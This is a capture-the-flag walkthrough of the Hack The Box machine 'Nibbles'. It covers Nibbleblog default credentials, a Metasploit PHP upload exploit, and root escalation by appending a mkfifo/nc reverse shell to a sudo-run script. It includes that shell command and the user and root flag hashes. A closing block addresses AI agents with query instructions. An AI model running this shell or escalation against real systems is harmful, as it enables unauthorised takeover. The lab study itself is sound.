# Nibbles

## Nibbles - 10.10.10.75

### Target Enumeration:

OS: Linux

IP: 10.10.10.75

User: b02ff32bb332deba49eeaed21152c8d8

Root: b6d745c0dfb6457c55591efc898ef88c

### Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.18

### Vulnerability Exploited:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code.

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh4.googleusercontent.com/420APuMpnY5dzCZSqWVD523n5g_W8pKJaiIIeGzQnqPrXd328dtykVKJk45av0SoALhP15ko5HzGsc1QRJHbBLsYlZ9OfUd_ny0urfG5iZyHebgDefpNUu87cTniOTn6gmVWTw7X" alt=""></div>

Visiting Port 80 and viewing the source code gives us the following:

<div align="left"><img src="https://lh6.googleusercontent.com/sMizMZOZAsyc395wV0AAG4RBAmn8tMVE9Cl3SK0fmD0fA9QLzK7_EeF-EzmNfvroYn8CkvoDvY3A4Es0rHKYAqotsdF0JyREN6NmAznQWyHeSI_wDfD1pluD_347NvWlKgf8A6xC" alt=""></div>

Using dirb against /nibbleblog gives us admin.php which is a login interface.

Testing the usernames and passwords for defaults gives us admin:nibbles

Searching for exploits gives us:

<div align="left"><img src="https://lh4.googleusercontent.com/5_clk_XuwBYZKsDyL-JBzWEyQ1YIsF4Xf5HDZimgEPN3WG8BrjwWejlKkg3imGb2Ykpbb29Eitrmun2993SoIk3b6aB07wuMPxZIBIGrNdPasCNYYKF7Y3NMmu4YV6ZDLHUcfiRz" alt=""></div>

We load metasploit and configure our options as follows:

![](https://lh6.googleusercontent.com/xoco6o95stqAIDhpSGwd7AQJHP-H_2tBS_PAHDmQW2QzfnVdziah9C1m9v4TBq13X0VvH0MJHD0CvV5XAFH8QM7wiqHMbsc5mqEfoi1RY4Zcb41PlYucXkTzapSuAubFhaBRssm2)

Run the exploit and get a low privileged user as nibbles:

![](https://lh5.googleusercontent.com/C3-5CAthS0662Q5SOKd5hXi9L6Tn7f7MsF5Lhbxodg7gN1SMoYp2W8hVbX45wMF_ctR8xpzx-FIjtieVE_xW6v4bUmsR95jGk1Z5d53KSvHjtVdIRCJDv51RpE6bDEebS5KefEZj)

Running LinEnum.sh on the host gives us a potential lead.

<div align="left"><img src="https://lh4.googleusercontent.com/LDGUHiqopRx9z334InU4SKnmlO5L3R8_o37izQDJuv3OBWS6Rx6HhS1WKshonDx_s7DyO5Yzf8MHHebtn1UFYbklr1qUzwZydBN0zMOgMlG35FfKVLFEckyjnI29Uf-60RFTz3L0" alt=""></div>

So we need to unzip personal.zip within /home/nibbler and modify monitor.sh to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/e_Dm39PPslm7aFuw8_jTZII3MQEWJxEcunw52JReAPBAexEXp8Stkpl0f_nRiEcn_kMaMJBcjK1v1wjYmDIPkwYzIPuqtoxMXASUFMiQL0QP64Lvx2mPpfhytlaRmXXJKeCCx52M" alt=""></div>

We set up a nc listener on port 2491 locally and we insert the following command into the monitor.sh file:

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 2491 >/tmp/f” >> monitor.sh

We then execute the monitor.sh file with /usr/bin/sudo to receive our root shell.

<div align="left"><img src="https://lh6.googleusercontent.com/w-6LVMBsAw2AOCm1Ge5qb7k6oUgGH0oWxGN872gwDfJqRkL30sCx79C01uPh98YzgTLhlk1u5pwAV5k2DWbVSraSooLwMmdTy9Vbgl7kCrz3m133tQ3uMr53LR0-GgXv0X82t6p5" alt=""></div>

And we receive a root shell in return.

<div align="left"><img src="https://lh4.googleusercontent.com/0AeFJXDNIcZ3xav-z4fz1-ecaIjn7kTNpnJNgHabxTKlQqL1majEDQCePsCrmQaPIqrl2eoQPeI35CPblt0y9czGCJbbnIf2gDFIZKEvMkaXwtZlmGAGtlOThKMwR-Vv2Cv5IHoc" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/nibbles.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.